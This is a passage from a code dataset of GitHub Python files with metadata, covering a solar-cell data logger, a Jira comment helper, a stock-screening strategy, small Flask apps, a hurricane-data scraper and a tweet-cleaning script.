datetime.datetime.now()\n end_time_string = str(end_time.hour) + ':' + str(end_time.minute) + ':' + str(end_time.second) + '.' + \\\n str(end_time.microsecond)\n\n logger.info(\"Committing curve data to the hard disk...\")\n with h5py.File(new_filename, 'a') as f:\n harvesting_condition_list = [(np.string_('Date'),\n np.string_('Start Time (Local Timezone)'),\n np.string_('End Time (Local Timezone)'),\n np.string_('Indoor/Outdoor'),\n np.string_('Light Intensity (Lux)'),\n np.string_('Weather Condition'),\n np.string_('Country'),\n np.string_('City')),\n (np.string_(start_date_string),\n np.string_(start_time_string),\n np.string_(end_time_string),\n np.string_(_harvesting_condition.indoor_or_outdoor),\n np.string_(_harvesting_condition.light_intensity),\n np.string_(_harvesting_condition.weather_condition),\n np.string_(_harvesting_condition.country),\n np.string_(_harvesting_condition.city))]\n dataset = f.create_dataset('harvesting conditions', data=harvesting_condition_list)\n create_conditions(path=new_filename, address=address, thermometer_temperature=temperature,\n solar_cell_model=solar_cell_model, end_time=end_time)\n for arr in data_array_buffer:\n with h5py.File(new_filename, 'a') as f:\n dataset = f.create_dataset('curve' + str(curve_counter), data=arr, dtype='f')\n curve_counter += 1\n break\n\n if not _iv_curves_queue.empty():\n iv_curve = _iv_curves_queue.get()\n x_temp = []\n y_temp = []\n for c in iv_curve.curve_points_list:\n x_temp.append(c.x)\n y_temp.append(c.y)\n\n data_array = np.array([x_temp, y_temp], dtype=float)\n data_array_buffer.append(data_array)\n","repo_name":"SepehrMosavat/PROGNOES","sub_path":"SOCRAETES/disk_io_functions.py","file_name":"disk_io_functions.py","file_ext":"py","file_size_in_byte":10338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10133366026","text":"import re\nimport printing as p\n\ndef main ():\n done = p.ask(\"Is this moving to Done? y/n\")\n done = done.lower()\n if done != 'y':\n nwr = p.ask(\"Is this a 'No work required'? y/n\")\n if nwr != 'y':\n p.err(\"If it's not 'Done' or 'No work required', idk what you're on.\")\n return\n comment = get_nwr_comment()\n else:\n comment = get_done_comment()\n if comment == \"\":\n return\n comment = comment.rstrip()\n p.info(\"===== START =====\")\n p.info(\"\")\n p.info(comment)\n p.info(\"\")\n p.info(\"===== END =====\")\n\ndef get_done_comment ():\n fix_version = p.ask(\"What version was this fixed in?\")\n fix_version = fix_version.upper()\n if fix_version[0] != \"V\":\n fix_version = \"V\" + fix_version\n if not validate_version(fix_version): \n p.ask(\"Please enter a proper fix version.\")\n if not validate_version(fix_version):\n p.err(\"Tell me what version it was fixed in, you spudnugget.\")\n return \"\"\n user_info = p.ask(\"What was wrong? (For dummies)\")\n support_info = p.ask(\"Any support notes?\")\n dev_notes = p.ask(\"Any dev notes?\")\n cherry_pick_info = p.ask(\"Cherry-picking notes? [Standard 48hrs]\")\n\n if is_no(cherry_pick_info):\n cherry_pick_info = \"Standard 48hrs\"\n\n comment = add_to_comment(\"\", \"Fixed in Version\", fix_version)\n comment = add_to_comment(comment, \"User-targeted Info\", user_info)\n comment = add_to_comment(comment, \"Frontline Info\", support_info)\n comment = add_to_comment(comment, \"Dev Info\", dev_notes)\n comment = add_to_comment(comment, \"Cherry-Picking\", cherry_pick_info)\n\n return comment \n\ndef get_nwr_comment ():\n reason = p.ask(\"Why doesn't this require work? O_o\")\n support_info = p.ask(\"Got any more information to help support?\")\n \n comment = add_to_comment(\"\", \"Reasoning\", reason)\n comment = add_to_comment(comment, \"Next steps for the frontline\", support_info)\n \n return comment\n\ndef validate_version (version):\n return (not is_no(version) and re.match(r\"V[0-9]{1,3}\\.[0-9]+\", version)) \n\ndef add_to_comment (comment, section, info):\n if is_no(info):\n info = \"N/A\"\n new_comment = comment + \"*\" + section + \":* \" + info + \"\\n\"\n return new_comment\n\ndef is_no (string):\n string = string.lower()\n re.sub(r'\\W+', '', string)\n return string == \"\" or string == \"n\" or string == \"no\" or string == \"none\" or string == \"na\" or string == \"nah\" or string == \"nope\" or string == \"not really\"\n\n# Then connect to Jira, execute the transaction, and add the comment in\n\n# Initially, we want to do this as a command line thing, but then maybe add a UI? Sounds like work though...\n\nmain()\n","repo_name":"watsonben/golden-tickets","sub_path":"golden-ticket-standard/make-golden-ticket.py","file_name":"make-golden-ticket.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16924042375","text":"import math, operator\n\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport talib\n\nfrom ..DyStockSelectStrategyTemplate import *\n\n\nclass DySS_BBands(DyStockSelectStrategyTemplate):\n name = 'DySS_BBands'\n chName = '布林'\n\n colNames = ['代码', '名称', '标准差均值比(%)', '当日收盘价下轨线离差比', '当日最低价下轨线离差比']\n\n param = OrderedDict\\\n ([\n ('基准日期', datetime.today().strftime(\"%Y-%m-%d\")),\n ('向前N日周期', 10),\n ('选几只股票', 50)\n ])\n\n def __init__(self, param, info):\n super().__init__(param, info)\n\n # unpack parameters\n self._baseDate = param['基准日期']\n self._forwardNDays = param['向前N日周期']\n self._selectStockNbr = param['选几只股票']\n\n def onDaysLoad(self):\n return self._baseDate, -self._forwardNDays + 1\n\n def onInit(self, dataEngine, errorDataEngine):\n self._stockAllCodes = dataEngine.daysEngine.stockAllCodes\n \n self._startDay = dataEngine.daysEngine.tDaysOffset(self._baseDate, -self._forwardNDays + 1)\n self._endDay = dataEngine.daysEngine.tDaysOffset(self._baseDate, 0)\n\n def onStockDays(self, code, df):\n # 计算布林线\n upper, middle, lower = self._bbands(df)\n if middle is None: return\n\n # 计算标准差\n std = upper[-1] - middle[-1]\n if std == 0: return\n\n close = df.ix[self._endDay, 'close']\n low = df.ix[self._endDay, 'low']\n\n # 计算标准差均值比\n stdMeanRatio = std*100/middle[-1]\n if close < middle[-1]:\n stdMeanRatio *= -1\n\n # 计算比例\n closeRatio = (close - lower[-1])/std\n lowRatio = (low - lower[-1])/std\n\n # 设置结果\n pair = [code, self._stockAllCodes[code], stdMeanRatio, closeRatio, lowRatio]\n self._result.append(pair)\n self._result.sort(key=operator.itemgetter(2))\n\n self._result = self._result[:self._selectStockNbr]\n\n def _bbands(self, df):\n try:\n close = df['close']\n except Exception as ex:\n return None, None, None\n\n if close.shape[0] != self._forwardNDays:\n return None, None, None\n\n try:\n upper, middle, lower = talib.BBANDS(\n close.values, \n timeperiod=self._forwardNDays,\n # number of non-biased standard deviations from the mean\n nbdevup=1,\n nbdevdn=1,\n # Moving average type: simple moving average here\n matype=0)\n except Exception as ex:\n return None, None, None\n\n return upper, middle, lower\n","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Select/Strategy/Cta/DySS_BBands.py","file_name":"DySS_BBands.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"} +{"seq_id":"13105619718","text":"import configparser\nimport logging\n\n\nclass Configuration:\n def __init__(self, config_file_path):\n self.config = dict()\n self._config_parser = configparser.ConfigParser()\n\n try:\n config_file = open(config_file_path, \"r\")\n self._config_parser.read_file(config_file)\n except (OSError, IOError) as e:\n err_msg = \"Error reading configuration from file \" + \\\n config_file_path\n raise ValueError(err_msg, e)\n\n try:\n logging.info(\"Reading configuration...\")\n self.__read_language_configuration()\n self.__read_twitter_configuration()\n self.__read_mongodb_configuration()\n logging.info(\"Configuration read correctly.\")\n except Exception as e:\n err_msg = \"Error reading configuration parameters from file \" + \\\n config_file_path\n raise ValueError(err_msg, e)\n\n def __read_language_configuration(self):\n logging.debug(\"Reading language configuration...\")\n\n lang_conf = self.config[\"language\"] = {}\n\n lang_conf[\"locale\"] = self._config_parser.get(\n \"language\", \"locale\")\n\n logging.debug(\"Language configuration read correctly.\")\n\n def __read_twitter_configuration(self):\n logging.debug(\"Reading Twitter configuration...\")\n\n twitter_conf = self.config[\"twitter\"] = {}\n\n twitter_conf[\"consumer_key\"] = self._config_parser.get(\n \"twitter\", \"consumer_key\")\n twitter_conf[\"consumer_secret\"] = self._config_parser.get(\n \"twitter\", \"consumer_secret\")\n twitter_conf[\"access_token_key\"] = self._config_parser.get(\n \"twitter\", \"access_token_key\")\n twitter_conf[\"access_token_secret\"] = self._config_parser.get(\n \"twitter\", \"access_token_secret\")\n\n logging.debug(\"Twitter configuration read correctly.\")\n\n def __read_mongodb_configuration(self):\n logging.debug(\"Reading MongoDB configuration...\")\n\n mongo_conf = self.config[\"mongodb\"] = {}\n\n mongo_conf[\"uri\"] = self._config_parser.get(\"mongodb\", \"uri\")\n mongo_conf[\"database\"] = self._config_parser.get(\"mongodb\", \"database\")\n mongo_conf[\"user\"] = self._config_parser.get(\"mongodb\", \"user\")\n mongo_conf[\"password\"] = self._config_parser.get(\"mongodb\", \"password\")\n mongo_conf[\"mechanism\"] = self._config_parser.get(\"mongodb\",\n \"mechanism\")\n\n logging.debug(\"MongoDB configuration read correctly.\")\n","repo_name":"logoff/almanac-bot","sub_path":"almanacbot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43545568264","text":"from flask import Flask\nfrom flaskext.mysql import MySQL\nimport requests\nfrom controller import postData\nfrom controller import sortList\n\napp = Flask(__name__)\nmysql = MySQL()\n\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = ''\napp.config['MYSQL_DATABASE_DB'] = 'citi'\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\n\nmysql.init_app(app)\n\nwith mysql.connect().cursor() as cursor:\n cursor.execute(open(\"DB_script/schema.sql\", \"r\").read())\n\n\n@app.route('/post_data', methods=['GET', 'POST'])\ndef post():\n max_price, location = postData.get_parameters()\n data = postData.list_data(max_price, location, cursor)\n sorted_data = sortList.sort_property_list(data, location)\n url = 'http://localhost:8000/'\n headers = {'Content-type': 'text/html; charset=UTF-8'}\n requests.post(url, data=sorted_data, headers=headers)\n return sorted_data\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0',port=5000)","repo_name":"CitiHackers/ServerSide","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34063248323","text":"\"\"\" Code to photo web page \"\"\"\nimport os\nimport io\nimport random\nfrom flask import render_template, abort, send_file\nfrom wand.image import Image\nfrom wand.resource import limits\nfrom src.helpers.app import AppHelper # pylint: disable=import-error\nfrom src.helpers import paths # pylint: disable=import-error\n\ndef add_photo_page(app, app_helper:AppHelper):\n \"\"\" Add Home Page \"\"\"\n @app.route(\"/photo\")\n @app.route('/photo/')\n def photo_page(refresh=900):\n \"\"\" Photo Page \"\"\"\n app_helper.prom_metrics.counter__requests__photo_page.inc()\n try:\n disk_photos = paths.get_files_on_disk(app_helper.configs.photo_location)\n photo = random.choice(list(disk_photos.keys()))\n return render_template('photo.html', URL=photo)\n except:\n return render_template('home.html', URL=\"\")\n\n @app.route('/photo/')\n def photo_contents(filename=\"\"):\n if filename == \"\":\n app_helper.prom_metrics.counter__error__404.inc()\n abort(404)\n disk_photos = paths.get_files_on_disk(app_helper.configs.photo_location)\n if filename not in disk_photos:\n app_helper.prom_metrics.counter__error__404.inc()\n abort(404)\n if not os.path.isfile(disk_photos[filename]['file_path']):\n app_helper.prom_metrics.counter__error__404.inc()\n abort(404)\n \n # Use 1GB of ram before writing temp data to disk.\n limits['memory'] = 1024 * 1024 * 1024\n # Reject images larger than 100000x100000.\n limits['width'] = 100000\n limits['height'] = 100000\n with Image(filename=disk_photos[filename]['file_path']) as img:\n return send_file(\n io.BytesIO(img.make_blob('jpeg')),\n mimetype='image/jpeg',\n as_attachment=False,\n download_name='%s.jpg' % disk_photos[filename]['file_name'])\n","repo_name":"Tomcuzz/icloud-photo-utils","sub_path":"src/pages/photo_page.py","file_name":"photo_page.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23566179741","text":"from timeit import default_timer as timer\r\nimport math\r\n\r\ndef stalls(n, k):\r\n l = math.floor(math.log(k, 2))\r\n p = k - 2**l + 1\r\n sum_l = n - 2**l + 1\r\n x = math.floor(sum_l / 2**l) + 1\r\n n_x = sum_l % 2**l\r\n x = x - int(p > n_x)\r\n\r\n# print l, p, x, n_x\r\n if x % 2 == 0:\r\n return int(x/2), int(x/2 -1)\r\n else:\r\n return int((x-1)/2), int((x-1)/2)\r\n\r\nstart = timer()\r\nfilename = 'C-small-2-attempt0'\r\nf = open(filename + '.in', 'r')\r\ng = open(filename + '.out', 'w')\r\nt = int(f.readline())\r\n\r\nfor i in xrange(1, t+1):\r\n\tn, k = [int(j) for j in f.readline().split(' ')]\r\n\trs, ls = stalls(n, k)\r\n\tg.write('Case #' + str(i) + ': ' + str(rs) + ' ' + str(ls) + '\\n')\r\n\r\nf.close()\r\ng.close()\r\nend = timer()\r\nprint (end - start)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1048.py","file_name":"1048.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9258879434","text":"from gnuradio import gr, blocks\nimport ldpc\n\nclass ldpc_hier_decoder_fb(gr.hier_block2):\n \"\"\"\n docstring for block ldpc_hier_decoder_fb\n \"\"\"\n def __init__(self, alist_file, sigma, max_iterations):\n gr.hier_block2.__init__(self,\n \"ldpc_hier_decoder_fb\",\n gr.io_signature(1, 1, gr.sizeof_float), # Input signature\n gr.io_signature(1, 1, gr.sizeof_char)) # Output signature\n\n # Define blocks and connect them\n decoder = ldpc.ldpc_decoder_fb(alist_file,\n sigma, max_iterations)\n K = decoder.get_K()\n N = decoder.get_N()\n str2Nvec = blocks.stream_to_vector(4, N)\n Kvec2str = blocks.vector_to_stream(1, K)\n\n self.connect(self, str2Nvec, decoder, Kvec2str, self)\n","repo_name":"manuts/gr-ldpc","sub_path":"python/ldpc_hier_decoder_fb.py","file_name":"ldpc_hier_decoder_fb.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"26537787772","text":"\n# include libraries.\n\nfrom bs4 import BeautifulSoup\nimport csv\nimport datetime\nimport urllib.request\nimport pandas as pd\nimport os\n\n# In command line, you will get a name of state. ex: AL\n\n# as you can see, this is some urls of data-page.\nhtml_doc = ''\nurl1 = 'https://www.aoml.noaa.gov/hrd/hurdat/UShurrs_detailed.html'\nurl2 = 'https://www.aoml.noaa.gov/hrd/hurdat/uststorms.html'\n\nexport_date = datetime.datetime.now()\nexport_xlsfname = export_date.strftime('%m') + '.' + \\\n export_date.strftime('%d') + '.' + \\\n export_date.strftime('%Y') + '.xlsx'\nif os.path.exists(export_xlsfname):\n try:\n os.rename(export_xlsfname, export_xlsfname + '_')\n os.rename(export_xlsfname + '_', export_xlsfname)\n except OSError as e:\n print(\"Excel file opened. After close, and then Try.\")\n exit()\n\ntitle = ['Name of Storm', 'No', 'Type', 'Estimated Landfall', 'Estimated Max Winds', 'Severity'] # colums in a table\n\nisRepeated = True\n\nresults = []\n\nwhile isRepeated:\n strInputState = input('Input your state\\n')\n strInputType = input('Input the type \"H\", \"MH\", \"TS\", \"ALL\"\\n')\n###---------the processing for first url----------------------\n try:\n request = urllib.request.Request(url1) # make a request(get) for fetching html page.\n response = urllib.request.urlopen(request) # get a handle of html page by using the requst.\n html_doc = response.read() # read a page in style of text, \n except Exception as ee: # if some exception is occured\n print(ee)\n print(\"Request Error.\")\n input('Press Enter to exit.')\n exit()\n\n def handleCellStr(_strCell, _bDelBar = True): # a function for processing a cell of table.\n strCell = _strCell.replace('\\t', '')\n strCell = strCell.replace('\\n', '')\n if _bDelBar == True:\n strCell = strCell.replace('-', '')\n strCell = strCell.replace(' ', '')\n return strCell\n\n\n # html page have to be converted into lxml\n bs_soup = BeautifulSoup(html_doc, \"lxml\")\n tag_lines = None\n try: # look for a part for analysation.\n tag_lines = bs_soup.find('td', {'id': 'tdcontent'}).find('div').find('font').find('table').findAll('tr')\n except Exception as ee:\n print(ee)\n print(\"No lines.\")\n input('Press Enter to exit.')\n exit()\n\n # if data is null,\n if tag_lines == None or len(tag_lines) == 0:\n print(\"No Content\")\n input('Press Enter to exit.')\n exit()\n\n # get a real values from data \n tag_lines = tag_lines[2:]\n for tr_line in tag_lines:\n line_cells = tr_line.find_all('td')\n if line_cells == None or len(line_cells) != 12:\n continue\n strDate = line_cells[0].text\n strTime = line_cells[1].text\n strLatitude = line_cells[2].text\n strLongitude = line_cells[3].text\n strMaxWinds = line_cells[4].text\n strSSHWS = line_cells[5].text\n strRMWnm = line_cells[6].text\n strCentralPressure = line_cells[7].text\n strOCI = line_cells[8].text\n strSize = line_cells[9].text\n strStates = line_cells[10].text\n strStormNames = line_cells[11].text\n\n strDate = handleCellStr(strDate, False)\n strTime = handleCellStr(strTime)\n strLatitude = handleCellStr(strLatitude)\n strLongitude = handleCellStr(strLongitude)\n strMaxWinds = handleCellStr(strMaxWinds)\n strSSHWS = handleCellStr(strSSHWS)\n strRMWnm = handleCellStr(strRMWnm)\n strCentralPressure = handleCellStr(strCentralPressure)\n strOCI = handleCellStr(strOCI)\n strSize = handleCellStr(strSize)\n strStates = handleCellStr(strStates)\n strStormNames = handleCellStr(strStormNames)\n \n # For the changing of date style\n while True:\n try:\n temp = strDate[len(strDate) - 1:]\n nTemp = int(temp)\n break\n except Exception as e:\n strDate = strDate[:len(strDate) - 1]\n \n strNoFront = format(int(strDate.split('-')[0]), '02d')\n strNo = strDate[len(strDate) - 2:] + '-' + strNoFront\n strModifedDate = strDate.split('-')[1]\n \n # look for a data that is stable for given state.\n bState = False\n strStateLast = ''\n strSeverity = ''\n if strStates.find(',') > -1:\n nList = [0]\n strStateItems = strStates.split(',')\n for strStateOne in strStateItems:\n if strStateOne.find(strInputState) > -1:\n strSeverity = strStateOne\n bState = True\n nList.append(int(strStateOne[len(strStateOne) - 1:]))\n strStateLast = str(max(nList))\n else:\n strSeverity = strStates\n if strStates.find(strInputState) > -1:\n bState = True\n strStateLast = strStates[len(strStates) - 1:]\n \n if bState == False:\n continue\n \n # from the number, get the some characters such as TS, H, MH and so on.\n\n strType = ''\n if strStateLast == '1':\n strType = 'TS'\n elif strStateLast == '2':\n strType = 'H'\n elif strStateLast == '3':\n strType = 'MH'\n elif strStateLast == '4':\n strType = 'MH'\n elif strStateLast == '5':\n strType = 'MH'\n\n if strType == strInputType or strInputType == \"ALL\":\n # for exporting to file, produce a line in the style of table column.\n line = [strStormNames, strNo, strType, strModifedDate, strMaxWinds, strSeverity]\n # collect the lines \n results.append(line)\n \n \n\n\n\n\n ###---------the processing for second url----------------------\n\n\n\n try:\n request = urllib.request.Request(url2)\n response = urllib.request.urlopen(request)\n html_doc = response.read()\n except Exception as ee:\n print(ee)\n print(\"Request Error.\")\n input('Press Enter to exit.')\n exit()\n\n def handleCellStr(_strCell, _bDelBar = True):\n strCell = _strCell.replace('\\t', '')\n strCell = strCell.replace('\\n', '')\n if _bDelBar == True:\n strCell = strCell.replace('-', '')\n strCell = strCell.replace(' ', '')\n return strCell\n\n\n # html_file = open(\"response.txt\", \"r\")\n # html_doc = html_file.read()\n # bs_soup = BeautifulSoup(html_doc, \"html.parser\")\n bs_soup = BeautifulSoup(html_doc, \"lxml\")\n tag_lines = None\n try:\n tag_lines = bs_soup.find('td', {'id': 'tdcontent'}).find('div').find('center').find('table').findAll('tr')\n \n # tag_lines = bs_soup.find('td', {'id': 'tdcontent'}).find_all('tr')\n except Exception as ee:\n print(ee)\n print(\"No lines.\")\n input('Press Enter to exit.')\n exit()\n\n if tag_lines == None or len(tag_lines) == 0:\n print(\"No Content\")\n input('Press Enter to exit.')\n exit()\n\n tag_lines = tag_lines[2:]\n idx = 0\n for tr_line in tag_lines:\n idx += 1\n line_cells = tr_line.find_all('td')\n if len(line_cells) != 7 and len(line_cells) != 8:\n continue\n #print(line_cells)\n strStorm = line_cells[0].text\n strDate = line_cells[1].text\n strTime = line_cells[2].text\n strLatitude = line_cells[3].text\n strLongitude = line_cells[4].text\n strMaxWinds = line_cells[5].text\n strStates = line_cells[6].text\n strStormNames = \"\"\n if len(line_cells) > 7:\n strStormNames = line_cells[7].text\n\n strStrom = handleCellStr(strStorm)\n strDate = handleCellStr(strDate, False)\n strTime = handleCellStr(strTime)\n strLatitude = handleCellStr(strLatitude)\n strLongitude = handleCellStr(strLongitude)\n strMaxWinds = handleCellStr(strMaxWinds)\n strStates = handleCellStr(strStates)\n strStormNames = handleCellStr(strStormNames)\n\n \n while True:\n try:\n temp = strDate[len(strDate) - 1:]\n nTemp = int(temp)\n break\n except Exception as e:\n strDate = strDate[:len(strDate) - 1]\n \n strNoFront = format(int(strStorm), '02d')\n strNo = strDate[len(strDate) - 2:] + '-' + strNoFront\n \n bState = False\n strStateLast = ''\n strSeverity = ''\n\n if strStates.find('/') > -1:\n nList = [0]\n strStateItems = strStates.split('/')\n for strStateOne in strStateItems:\n if strStateOne.find(strInputState) > -1:\n strSeverity = strStateOne\n bState = True\n strStateLast = str(max(nList))\n else:\n strSeverity = strStates\n if strStates.find(strInputState) > -1:\n bState = True\n strStateLast = strStates[len(strStates) - 1:]\n \n if bState == False:\n continue\n \n strType = 'TS'\n if strType == strInputType or strInputType == \"ALL\":\n line = [ strStormNames, strNo, strType, strDate, strMaxWinds, strSeverity]\n results.append(line)\n\n isOK = input(\"Are you going to repeat? You can input 'y' or 'n'. \\n\")\n if isOK == 'y':\n isRepeated = True\n else:\n isRepeated = False\n # conclude columns and results to export to excel.\n\ndf = pd.DataFrame(results, columns=title)\n # export the data into excel, filename, sheet->hurricane.\ndf.to_excel(export_xlsfname, sheet_name='hurricane', index=False)\n\n # if it is completed, print the text as follows.\ninput('Press Enter to exit.')","repo_name":"Eagle9461/Hurrican_Analysis","sub_path":"hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4790593066","text":"import pandas as pd\nimport datetime\nfrom nltk.corpus import stopwords\nimport string\nimport re\nimport nltk\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.stem import PorterStemmer\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport operator\nimport collections\n\n# define the variables of the program\nlemma = WordNetLemmatizer()\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\nps = PorterStemmer()\n\n\nfacebook = pd.read_csv(\"fb.csv\", lineterminator='\\n')\namazon = pd.read_csv(\"amzn.csv\", lineterminator='\\n')\napple = pd.read_csv(\"appl.csv\", lineterminator='\\n')\ngoogle = pd.read_csv(\"goog.csv\", lineterminator='\\n')\ntesla = pd.read_csv(\"tsla.csv\", lineterminator='\\n')\nnetflix = pd.read_csv(\"nflx.csv\", lineterminator='\\n')\nlist_stocks = [facebook, amazon, apple, google, tesla, netflix]\nlist_names_stocks = [\"facebook\", \"amazon\", \"apple\", \"google\", \"tesla\", \"netflix\"]\n\n'''\ndef change_format_of_dates_line(row):\n \"\"\"\n the function converts the format of the days of the dataframe\n :param row: the chosen row\n :return: a formatted string\n \"\"\"\n try:\n temp = datetime.datetime.strptime(row, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%d')\n return temp\n except Exception:\n return \"2021-01-01\"\n'''\n\n\ndef change_format_of_dates_slash(row):\n \"\"\"\n the function converts the format of the days of the dataframe\n :param row: the chosen row\n :return: a formatted string\n \"\"\"\n try:\n temp = datetime.datetime.strptime(row, '%m/%d/%Y %H:%M').strftime('%Y-%m-%d')\n return temp\n except Exception:\n return \"2021-01-01\"\n\n\namazon['date'] = amazon['date'].apply(change_format_of_dates_slash)\nnetflix['date'] = netflix['date'].apply(change_format_of_dates_slash)\ntesla['date'] = tesla['date'].apply(change_format_of_dates_slash)\nfacebook['date'] = facebook['date'].apply(change_format_of_dates_slash)\napple['date'] = apple['date'].apply(change_format_of_dates_slash)\ngoogle['date'] = google['date'].apply(change_format_of_dates_slash)\n\n# convert the string column to a datetime column\nfor df, name in zip(list_stocks, list_names_stocks):\n try:\n print(f\"Dataframe Name: {name}\")\n print(f\"Number of records before the cleaning process: {df.shape}\")\n df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d %H:%M:%S')\n df = df[(df['date'] >= '2021-05-04') & (df['date'] <= '2021-05-11')]\n print(f\"Number of records after filtering dates: {df.shape}\")\n df = df.drop_duplicates(subset='tweet', keep=\"last\")\n print(f\"Number of records after removing duplicates: {df.shape}\")\n list_stocks.append(df)\n except Exception:\n df['date'] = pd.to_datetime(df['date'], format='%m/%d/%Y %H:%M')\n df = df[(df['date'] >= '5/4/2021') & (df['date'] <= '5/11/2021')]\n print(f\"Number of records after filtering dates: {df.shape}\")\n df = df.drop_duplicates(subset='tweet', keep=\"last\")\n print(f\"Number of records after removing duplicates: {df.shape}\")\n list_stocks.append(df)\n print()\n\n\nlist_stocks = list_stocks[0:6]\n\nfor item in list_stocks:\n print(item.shape)\n# Code from the lecture in order to clean the tweets\n\npunctuation = list(string.punctuation)\nstop = stopwords.words('english') + punctuation + ['rt', 'via', 'the', u'\\u2019', u'\\u2026',\n 'The', u'de', u'\\xe9',\n 'ï', '¿', '\\u200d', '\\u200b']\n\nemoticons_str = r\"\"\"\n (?:\n [:=;] # Eyes\n [oO\\-]? # Nose (optional)\n [D\\)\\]\\(\\]/\\\\OpP] # Mouth\n )\"\"\"\n\nregex_str = [\n emoticons_str,\n r'<[^>]+>', # HTML tags\n r'(?:@[\\w_]+)', # @-mentions\n r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n\n r'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n r\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n r'(?:[\\w_]+)', # other words\n r'(?:\\S)' # anything else\n]\n\ntokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)\nemoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)\n\n\ndef transform_tweets_to_tokens(tweets):\n \"\"\"\n the function takes a full string of tweets and separtes it into tokens\n :param tweets: a string of tweets\n :return: tokens\n \"\"\"\n tweets_tokens = [preprocess(tweet, True, False) for tweet in tweets]\n return tweets_tokens\n\n\ndef tokenize(s):\n \"\"\"\n the function takes a specific token and checks if it fits to a regex\n :param s: a string\n :return: a fixed version of the token (if it fits to an emoji regex for example)\n \"\"\"\n try:\n return tokens_re.findall(s)\n except Exception:\n return None\n\n\ndef normalize_word(text, removeSpecial=False):\n \"\"\"\n the function takes a token and transform it to small letters and lemmatization\n :param text: the string of the tweet\n :param removeSpecial: tells the function not to clean special characters\n :return: a normalized tokens\n \"\"\"\n exclude = set(string.punctuation)\n stop_free = []\n if removeSpecial:\n no_special = [CleanTweet(t) for t in text]\n stop_free = [i.strip() for i in text if i not in stop and i]\n else:\n stop_free = [i.strip() for i in text if i not in stop and i]\n normalized = [lemma.lemmatize(word) for word in stop_free]\n return normalized\n\n\ndef CleanTweet(tweet):\n \"\"\"\n the function cleans tokens from some characters or line up the format\n :param tweet: the string of the tweet\n :return: a clean and formatted token\n \"\"\"\n tweet = tweet.lower()\n tweet = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', tweet, flags=re.MULTILINE)\n tweet = re.sub(r'\\.', ' . ', tweet)\n tweet = re.sub(r'\\!', ' !', tweet)\n tweet = re.sub(r'\\?', ' ?', tweet)\n tweet = re.sub(r'\\,', ' ,', tweet)\n tweet = re.sub(r':', ' : ', tweet)\n tweet = re.sub(r'#', ' # ', tweet)\n tweet = re.sub(r'@', ' @ ', tweet)\n tweet = re.sub(r' amp ', ' and ', tweet)\n tweet = re.sub(r' . . . ', ' ', tweet)\n tweet = re.sub(r' . . . ', ' ', tweet)\n tweet = re.sub(r' ! ! ', ' ! ', tweet)\n tweet = re.sub(r'&', 'and', tweet)\n tweet = re.sub('[^A-Za-z0-9]+', '', tweet)\n return tweet\n\n\ndef preprocess(s, lowercase=False, toStringList=False):\n \"\"\"\n the function takes all of the tweets and preprocess them so we can do additional statistic\n :param s: the string of the tweet\n :param lowercase: boolean of lowercase conversation\n :param toStringList: boolean if to convert it back to a string\n :return: string or separated tokens\n \"\"\"\n tokens = tokenize(s)\n if not tokens:\n return \"\"\n if lowercase:\n tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n if toStringList:\n tokens = normalize_word(tokens, True)\n else:\n tokens = normalize_word(tokens)\n if toStringList:\n tokens = [x for x in tokens if x]\n tokens = ' '.join(tokens)\n return tokens\n\n\ndef find_all_hashtags(row):\n \"\"\"\n the function all of the hashtags in a tweet\n :param row: a single tweet\n :return: list of hashtags\n \"\"\"\n try:\n hashtags = [i for i in row.split() if i.startswith(\"#\")]\n return hashtags\n except Exception:\n return []\n\n\ndef find_all_tags(row):\n \"\"\"\n the function all of the tags in a tweet\n :param row: a single tweet\n :return: list of tags\n \"\"\"\n try:\n tags = [i for i in row.split() if i.startswith(\"@\")]\n return tags\n except Exception:\n return []\n\n\ndef create_df_from_list_tuple(list_tup):\n \"\"\"\n converts a list of tuples into a df\n :param list_tup: list of tuple (word, number)\n :return: a 